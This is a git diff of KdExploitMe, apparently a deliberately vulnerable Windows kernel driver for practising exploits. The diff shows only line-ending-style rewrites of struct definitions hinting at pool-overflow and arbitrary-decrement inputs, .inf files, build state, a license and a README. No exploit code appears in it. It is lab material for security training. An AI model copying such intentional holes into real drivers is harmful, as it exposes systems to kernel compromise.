\ No newline at end of file
diff --git a/KdExploitMe/Structures.h b/KdExploitMe/Structures.h
index 44184ae..e151520 100644
--- a/KdExploitMe/Structures.h
+++ b/KdExploitMe/Structures.h
@@ -1,27 +1,27 @@
-#pragma once
-
-
-#include
-#include
-
-
-typedef struct _DATACOPY
-{
- DWORD SourceLength;
- PVOID Source;
- DWORD DestLength;
- PVOID Dest;
-} DATACOPY, *PDATACOPY;
-
-typedef struct _DECADDRESS
-{
- BOOL Dec;
- size_t* Value;
-} DECADDRESS, *PDECADDRESS;
-
-typedef struct _OVERFLOW_PAGEDPOOL
-{
- POOL_TYPE PoolType;
- DWORD AllocationSize;
- UNICODE_STRING UserData;
-} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
+#pragma once
+
+
+#include
+#include
+
+
+typedef struct _DATACOPY
+{
+ DWORD SourceLength;
+ PVOID Source;
+ DWORD DestLength;
+ PVOID Dest;
+} DATACOPY, *PDATACOPY;
+
+typedef struct _DECADDRESS
+{
+ BOOL Dec;
+ size_t* Value;
+} DECADDRESS, *PDECADDRESS;
+
+typedef struct _OVERFLOW_PAGEDPOOL
+{
+ POOL_TYPE PoolType;
+ DWORD AllocationSize;
+ UNICODE_STRING UserData;
+} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
diff --git a/KdExploitMe/Win7Debug/KdExploitMe.inf b/KdExploitMe/Win7Debug/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/KdExploitMe/Win7Debug/KdExploitMe.inf
+++ b/KdExploitMe/Win7Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index 02e5dd3..63898e6 100644
--- a/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
+++ b/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe/Win7Release/KdExploitMe.inf b/KdExploitMe/Win7Release/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/KdExploitMe/Win7Release/KdExploitMe.inf
+++ b/KdExploitMe/Win7Release/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index bc243c7..80286fb 100644
--- a/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
+++ b/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Release|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Release|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe/Win8.1Debug/KdExploitMe.inf b/KdExploitMe/Win8.1Debug/KdExploitMe.inf
index bb8408a..d638688 100644
--- a/KdExploitMe/Win8.1Debug/KdExploitMe.inf
+++ b/KdExploitMe/Win8.1Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,21.57.22.901
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,21.57.22.901
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index cd25adb..01347e1 100644
--- a/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
+++ b/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/LICENSE b/LICENSE
index dc35191..921565b 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,24 +1,24 @@
-Copyright (c) 2014, clymb3r
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
+Copyright (c) 2014, clymb3r
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
diff --git a/README.md b/README.md
index a2a701f..6174e3d 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
-KdExploitMe
-===========
-
-A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
-
+KdExploitMe
+===========
+
+A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
+
The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, I have written this driver in the hopes that you will use this knowledge for good.
\ No newline at end of file
diff --git a/Win7Debug/KdExploitMe Package/KdExploitMe.inf b/Win7Debug/KdExploitMe Package/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/Win7Debug/KdExploitMe Package/KdExploitMe.inf
+++ b/Win7Debug/KdExploitMe Package/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Debug/KdExploitMe.inf b/Win7Debug/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/Win7Debug/KdExploitMe.inf
+++ b/Win7Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Release/KdExploitMe Package/KdExploitMe.inf b/Win7Release/KdExploitMe Package/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/Win7Release/KdExploitMe Package/KdExploitMe.inf
+++ b/Win7Release/KdExploitMe Package/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Release/KdExploitMe.inf b/Win7Release/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/Win7Release/KdExploitMe.inf
+++ b/Win7Release/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"